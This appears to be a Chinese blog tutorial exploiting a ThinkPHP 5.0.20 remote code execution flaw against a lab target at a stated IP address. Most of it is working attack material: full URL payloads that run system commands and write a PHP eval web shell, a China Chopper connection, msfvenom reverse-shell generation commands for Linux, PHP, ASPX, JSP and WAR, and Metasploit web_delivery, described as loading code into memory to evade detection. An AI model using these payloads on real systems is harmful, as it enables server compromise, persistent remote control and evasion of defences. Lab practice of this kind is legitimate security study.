19 MSF框架之linux攻击

简介: Thinkphp 5.0.20漏洞利用

靶场:Thinkphp 5.0.20

150.158.137.72:8081

 

 

漏洞利用payload

 

 

http://150.158.137.72:8081/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&
vars
[1][]=whoami


 image.pnghttp://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_p
ut_contents
&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST[ccc]);?%3E


image.png





 http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls


image.png


 shell.php访问成功

view-source:150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat shell.php


 image.png

 

访问index.php

view-source:150.158.137.72:8081/index.php

image.png



访问shell.php


image.png


菜刀连接

image.png


image.png


 image.png

 

 

MSF生成木马攻击上线webshell

生成可执行文件


linux

msfvenom
-p linux/x64/meterpreter/reverse_tcp lhost=<you host>-p
<
you port>-f elf -o muma.elf

php
:
msfvenom
-p php/meterpreter/reverse_tcp LHOST=<YourIPAddress>LPORT=<Your Port to
Connect On
>-f raw >shell php
asp
:
msfvenom
-a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address
>LPORT=<Your Port to Connect On>-f aspx - o shell.aspx
jsp
:
msfvenom
-p java/jsp_shell reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On
>-fraw >shell jsp
war
:
msfvenom
-p java/jsp_shell_reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On
>-f war >shell.war

纯文本

 

将文件上传到webshell服务器

 

 

赋予执行权限

执行木马

上线到msf

 

 

利用python生成交互式shell

反弹shell ——直接访问就可以执行   上线到msf

php: msfvenom-p php/meterpreter/reverse_tcp LHOST= <Your IP Address> LPORT= <Your Port to Connect On> -f raw >shell php asp: msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f aspx - o shell.aspx jsp: msfvenom -p java/jsp_shell reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -fraw >shell jsp war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f war > shell.war

 

 

 

 

WEB_delivery上线到msf

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时, web_delivery就派上用场

 

 

① web_delivery的主要目的是快速和受害者主机建立一条session.当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以使用web_delivery生成的一条命令建立连接。
另外web_deliverypayload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。
③ web_delivery
支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 012来设置是使用php还是python还是powershell等。

search web_delivery


image.png 

 

http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=msf生成的payload(php -d all)


 

 

 

相关文章
|
6月前
|
Shell Linux 网络安全
linux系统防CC攻击自动拉黑IP增强版(Shell脚本)
linux系统防CC攻击自动拉黑IP增强版(Shell脚本)
210 0
|
6月前
|
Linux Android开发
嵌入式linux中Framebuffer 驱动程序框架分析
嵌入式linux中Framebuffer 驱动程序框架分析
68 0
|
2月前
|
Linux API SoC
Linux电压和电流调节器框架 【ChatGPT】
Linux电压和电流调节器框架 【ChatGPT】
|
3月前
|
监控 安全 Linux
在Linux中,DDOS攻击的原理是什么?
在Linux中,DDOS攻击的原理是什么?
|
3月前
|
监控 网络协议 Linux
在Linux中,什么是DDoS攻击?如何在Linux中防御DDoS攻击?
在Linux中,什么是DDoS攻击?如何在Linux中防御DDoS攻击?
|
3月前
|
监控 安全 Linux
在Linux中,如何配置和使用fail2ban来防止暴力攻击?
在Linux中,如何配置和使用fail2ban来防止暴力攻击?
|
3月前
|
SQL 监控 安全
在Linux中,如何检测和防止SQL注入和跨站脚本(XSS)攻击?
在Linux中,如何检测和防止SQL注入和跨站脚本(XSS)攻击?
|
5月前
|
Java Linux PHP
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
【应急响应】后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
111 1
|
5月前
|
Linux 程序员 芯片
【Linux驱动】普通字符设备驱动程序框架
【Linux驱动】普通字符设备驱动程序框架
|
5月前
|
Linux 芯片
Linux 驱动开发基础知识——查询方式的按键驱动程序_编写框架(十三)
Linux 驱动开发基础知识——查询方式的按键驱动程序_编写框架(十三)
69 2
下一篇
无影云桌面